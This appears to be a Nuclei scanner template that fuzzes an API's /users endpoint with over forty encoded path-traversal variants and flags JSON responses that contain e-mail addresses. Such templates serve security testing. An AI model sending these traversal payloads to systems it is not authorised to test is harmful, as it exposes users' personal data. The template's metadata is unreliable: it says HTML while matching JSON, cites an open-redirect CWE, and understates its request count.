id: users11

info:
  name: api-users
  author: xandsz
  severity: medium
  description: "Detecta presença de e-mails em respostas HTML"
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    max-request: 2
  tags: fuzzer, generic, email

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/..%2f/users"
      - "{{BaseURL}}/api/%2e%2e%2f/users"
      - "{{BaseURL}}/api/%252e%252e%252f/users"
      - "{{BaseURL}}/api/%c0%ae%c0%ae%c0%afusers"
      - "{{BaseURL}}/api/%25c0%25ae%25c0%25ae%25c0%25afusers"
      - "{{BaseURL}}/api/%c0%ae%c0%ae\\users"
      - "{{BaseURL}}/api/%25c0%25ae%25c0%25ae\\users"
      - "{{BaseURL}}/api/..%5c/users"
      - "{{BaseURL}}/api/%2e%2e%5c/users"
      - "{{BaseURL}}/api/%252e%252e%255c/users"
      - "{{BaseURL}}/api/..\\users"
      - "{{BaseURL}}/api/..;/users"
      - "{{BaseURL}}/api/.%2e/users"
      - "{{BaseURL}}/api/.././users"
      - "{{BaseURL}}/api//../users"
      - "{{BaseURL}}/api/....//users"
      - "{{BaseURL}}/api/%2e%2e\\users"
      - "{{BaseURL}}/api/..%c1%9c/users"
      - "{{BaseURL}}/api/%%32%66/users"
      - "{{BaseURL}}/api/%%32%65%%32%65/users"
      - "{{BaseURL}}/api/%%32%65%%32%65%%35%63/users"
      - "{{BaseURL}}/api/..%25c1%259c/users"
      - "{{BaseURL}}/api/%uff0e%uff0e%u2215users"
      - "{{BaseURL}}/api/%uff0e%uff0e\\users"
      - "{{BaseURL}}/api/%uff0e%uff0e%u2216users"
      - "{{BaseURL}}/api/%2e%2e%2f/users"
      - "{{BaseURL}}/api/%252Fusers"
      - "{{BaseURL}}/api/%252e%252e%252f/users"
      - "{{BaseURL}}/api/%FF%2E%FF%2E/users"
      - "{{BaseURL}}/api/%2e%2e%2f/users"
      - "{{BaseURL}}/api/%2e%2e%2fusers"
      - "{{BaseURL}}/api/%252e%252eusers"
      - "{{BaseURL}}/api/%2e%2e%2fusers"
      - "{{BaseURL}}/api/..%2f..%2f/users"
      - "{{BaseURL}}/api/..../users"
      - "{{BaseURL}}/api/...\\users"
      - "{{BaseURL}}/api/........................................................................../users"
      - "{{BaseURL}}/api/..........................................................................\\users"
      - "{{BaseURL}}/api/%u2215users"
      - "{{BaseURL}}/api/%u2216users"
      - "{{BaseURL}}/api/%uEFC8users"
      - "{{BaseURL}}/api/%uF025users"
      - "{{BaseURL}}/%61%70%69/users"

    headers:
      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
      - type: word
        part: header
        words:
          - application/json
      - type: status
        status:
          - 200
